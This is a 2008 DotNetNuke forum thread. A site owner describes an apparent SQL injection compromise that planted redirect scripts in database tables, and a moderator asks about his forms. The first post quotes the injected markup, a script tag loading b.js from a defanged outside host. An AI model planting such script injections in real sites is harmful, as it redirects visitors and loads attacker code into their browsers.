Small width layout Medium width layout Maximum width layout Small text Medium text Large text
     Search
Downloads Downloads Directory Directory Forums Forums Forge Forge Blogs Blogs        Marketplace Marketplace Careers Program Careers
Community › Forums Register  |  

Maximum ASP
  Ads  
Biz Modules provides professional business modules and solutions for DotNetNuke
 


  Sponsors  

Meet Our Sponsors

MaximumASP
SourceGear - Tools for Developers
.: CounterSoft :.
telerik
ExactTarget email software solutions
Merak Mail Server
 


DotNetNuke Forums
 
  Forum  General DotNetN...  Chat About It!  Possible SQL injection problem
Previous Previous
 
Next Next
New Post 5/14/2008 6:52 PM
User is offline Roy Cupps
6 posts
www.catadjuster.org
10th Ranked


Possible SQL injection problem 

I'm having some problems with my  site today.  My site is uses Dotnetnuke version 4.8.2,  Currently I have both non-dnn pages and dnn page. Nothing is being displayed on the homepage and I receive a "The hostname could not be parsed" when I visit it..  I can get to other dnn pages using the tabid instead but not the friendly name that was working yesterday, once I visit one the other pages and click on any link I'm redirected to another site. When you view the source of the page  the link looks like this; <menuitem id="69" title="&amp;nbsp;On The Road" url="catadjuster.org&lt;script src=http://www.bad site link.com/b.js&gt;&lt;/script&gt;/Home/OnTheRoad.aspx" />.  Also, when I try to login I receive a "invalid character in a Base-64 string" error. 

I currently have the site offline but did not have any trouble with the site yesterday and I do not have any trouble with the links on the non-dnn pages work good.  I restored a backup of the MSSQL database hoping this would clear things up but it did not.  I believe there may have been some SQL injection attempt on the non-dnn pages but I'm not sure.  Any thoughts on where to look fo the problems? 

 
New Post 5/14/2008 11:24 PM
User is offline Chris Hammond
3047 posts
www.engagesoftware.com
4th Ranked








Re: Possible SQL injection problem 

Roy,

What kind of non DNN pages do you have running on your site? Any forms access the DNN database?


Chris Hammond
Engage Software
St. Louis, MO
314.966.4000


The leading provider of DotNetNuke skinning, training and custom module development.
Official DotNetNuke® Training Provider
 
New Post 5/15/2008 5:52 AM
User is offline Roy Cupps
6 posts
www.catadjuster.org
10th Ranked


Re: Possible SQL injection problem 

Hi Chris,

 

Yes I use many forms on the DNN pages.  When checking the database so far I have found the script that redirects links to a site that trys to download additional scripts in the text fields of DesktopModules and Activeforms_MC tables.

 
New Post 5/15/2008 6:34 AM
User is offline Roy Cupps
6 posts
www.catadjuster.org
10th Ranked


Re: Possible SQL injection problem 

I'm sorry I stated DNN pages but I do have forms on the non-DNN as well.

 
Previous Previous
 
Next Next
  Forum  General DotNetN...  Chat About It!  Possible SQL injection problem
 


Forum Policy

These Discussion Forums are dedicated to the discussion of the DotNetNuke Web Application Framework.

For the benefit of the community and to protect the integrity of the project, please observe the following posting guidelines:

1. No Advertising. This includes promotion of commercial and non-commercial products or services which are not directly related to DotNetNuke.
2. Discussion or promotion of DotNetNuke product releases under a different brand name are strictly prohibited.
3. No Flaming or Trolling.
4. No Profanity, Racism, or Prejudice.
5. Site Moderators have the final word on approving/removing a thread or post or comment.
6. English language posting only, please.

 


Digicon: DotNetNuke design and development
Digicon is based in Brisbane, Queensland, Australia
digicon.com.au
Live Visitor Tracking & Live Chat For DotNetNuke
Track your visitors in real time and add live chat for sales & support. Free Trial.
www.whoson.com
SINA101
WANT A SPECial sIte iN TAIWAN?
sina101.com

DotNetNuke Corporation   Terms Of Use  Privacy Statement
DotNetNuke®, DNN®, and the DotNetNuke logo are trademarks of DotNetNuke Corporation
Hosted by MaximumASP